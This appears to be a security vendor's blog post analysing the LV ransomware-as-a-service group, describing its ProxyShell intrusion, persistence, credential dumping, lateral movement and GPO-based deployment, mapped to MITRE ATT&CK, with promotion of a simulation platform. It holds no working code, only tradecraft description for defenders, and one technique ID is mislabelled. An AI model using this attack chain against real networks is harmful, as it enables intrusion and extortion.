LV Ransomware Analysis and Simulation

Ransomware-as-a-Service (RaaS) is one of the top ransomware trends observed in recent years. Some ransomware groups, such as Conti, LockBit, and BlackCat rent or sell their malicious payloads to other threat groups. Following this popular trend, the LV ransomware group operates as a RaaS provider and targets organizations in the US, Canada, Saudi Arabia, and many European countries. In their latest ransomware attack, the LV ransomware group hit a Jordan-based company [1].

Picus Threat Library includes attack simulations for different LV ransomware variants, and Picus Labs advises organizations to assess their security posture against adversary techniques used by the LV ransomware group. In this blog, we explained how the LV ransomware group operates and which adversary techniques they use.

Simulate Ransomware Threats with 14-Day Free Trial of Picus Platform

LV Ransomware Group

LV group is a Ransomware-as-a-Service group that has been active since late 2020. Their ransomware payloads are reportedly based on another infamous ransomware group called REvil (aka Sodinokibi). However, the nature of the relationship between LV and REvil is not clear. The research suggests that the LV group either bought or stole the source code from the REvil group and then modified it for their ransomware operations [2].

In addition to RaaS operations, the LV ransomware group also uses initial access brokers (IABs) and buys their way into organizations. LV ransomware group mainly targets manufacturing, retail, and technology organizations in Europe, North America, and Asia. For example, they attacked Germany-based multinational semiconductor manufacturer SEMIKRON in August 2022, and threat actors claimed to steal 2TB worth of documents [3].

How Does the LV Ransomware Group Operate?

As an initial access technique, the LV ransomware group drops a web shell into public access folders by abusing ProxyShell vulnerabilities in Microsoft Exchange servers. After gaining initial access, threat actors establish persistence by modifying registry keys that execute a malicious PowerShell script whenever a user logs on. The PowerShell script installs a backdoor in the victim's environment.

Figure 1: LV ransomware persistence mechanism [1]

Afterward, the group uses netscan and Advanced Port Scanner for network discovery and Mimikatz for credential dumping. Logs collected from compromised servers indicate that threat actors were able to log in via compromised user accounts multiple times. The LV ransomware group used the domain administrator account to move laterally via RDP and infect other assets in the victim's network.

In the final step, attackers create a custom group policy object and set a scheduled task that runs the batch files named ‘install.bat' and ‘1.bat' to deploy the ransomware to all computers that were connected to the domain controller. 

Figure 2: The XML file to schedule tasks in the DC group policies folder [1]

Once the sensitive files are encrypted, threat actors delete their malicious artifacts and drop a ransom note on machines.

Figure 3: A ransom note sample by LV Ransomware [4]

TTPs Used by LV Ransomware Group

LV ransomware group uses the following tactics, techniques, and procedures (TTPs) in the MITRE ATT&CK framework:

Tactic: Initial Access

• T1190 Exploit Public-Facing Application

LV group exploits ProxyShell and ProxyLogon vulnerabilities in MS Exchange servers to gain initial access.

Tactic: Execution

• T1059.001 Command and Scripting Interpreter: Powershell

LV group uses PowerShell for several purposes, such as downloading other malicious files.

• T1059.003 Command and Scripting Interpreter:Windows Command Shell

LV group executes .bat files for purposes such as deploying ransomware on target machines and disabling their security mechanisms.

Figure 4: Contents of ‘install.bat' file to disable security services [1] 

Figure 5: Contents of ‘1.bat' file [1]

Tactic: Persistence

• T1078.002 Valid Accounts: Domain Accounts

LV group establishes persistence by using compromised user accounts in the Active Directory.

• T1505.003 Server Software Component: Web Shell

LV group deploys a web shell to compromised computers as a gateway into the victim's network.

• T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

LV group modifies the registry keys below to execute a malicious PowerShell script whenever a user logs in.

Tactic: Privilege Escalation

• T1078.002 Valid Accounts: Domain Accounts

LV group gains domain admin privileges via the compromised credentials for the domain administrator account.

Tactic: Defense Evasion

• T1036.004 Masquerading: Masquerade Task or Service

LV ransomware names its malicious scheduled task as 'GoogleUpdateUX' to make them appear legitimate.

• T1027.002 Obfuscated Files or Information: Software Packing

LV group stores the ransomware binary in RC-4 encrypted format within a section with the name 'enc' in order to avoid signature-based detection

• T1484.001 Domain Policy Modification: Group Policy Modification

LV group creates a malicious Group Policy Object that schedules the tasks for deploying their malware to bypass execution policies.

• T1562.001 Impair Defenses: Disable or Modify Tools

LV group executes the 'install.bat' file on target computers in order to disable security services.

• T1070.004 Indicator Removal: File Deletion

LV group deleted their artifacts from the victim's network after encrypting files to minimize their footprint and avoid forensic analysis.

Tactic: Credential Access

• T1003.001 OS Credential Dumping

LV group uses Mimikatz to dump account credentials.

Tactic: Discovery

• T1083 Network Service Discovery

LV group uses tools such as Netscan and Advanced Port Scanner to discover services in the network.

Tactic: Lateral Movement

• T1021.001 Remote Services: Remote Desktop Protocol

LV group moves laterally to other hosts in the victim's network via RDP and the compromised domain admin credentials.

Tactic: Command and Control

• T1105 Ingress Tool Transfer

LV group downloads third-party tools they need to the compromised network via built-in utilities such as IEX().downloadString().

Tactic: Impact

• T1486 Data Encrypted for Impact

LV ransomware encrypts victims' files and appends them with extensions such as 'l7dm4566n'. 

How Picus Helps Simulate LV Ransomware Attacks?

We also strongly suggest simulating LV ransomware attacks to test the effectiveness of your security controls against ransomware attacks using the Picus Complete Security Validation Platform. You can test your defenses against LV ransomware and hundreds of other ransomware such as REvil, BlackCat, and LockBit within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for LV ransomware: 

Indicators of Compromises

References

[1] "LV Ransomware Exploits ProxyShell in Attack on a Jordan-based Company," Trend Micro, Oct. 25, 2022. [Online]. Available: https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html. [Accessed: Oct. 27, 2022]

[2] "GOLD NORTHFIELD." [Online]. Available: http://www.secureworks.com/research/threat-profiles/gold-northfield. [Accessed: Oct. 27, 2022]

[3] S. Gatlan, "Semiconductor manufacturer Semikron hit by LV ransomware attack," BleepingComputer, Aug. 02, 2022. [Online]. Available: https://www.bleepingcomputer.com/news/security/semiconductor-manufacturer-semikron-hit-by-lv-ransomware-attack/. [Accessed: Oct. 27, 2022]

[4] "LV Ransomware," Jun. 22, 2021. [Online]. Available: https://www.secureworks.com/research/lv-ransomware. [Accessed: Oct. 27, 2022]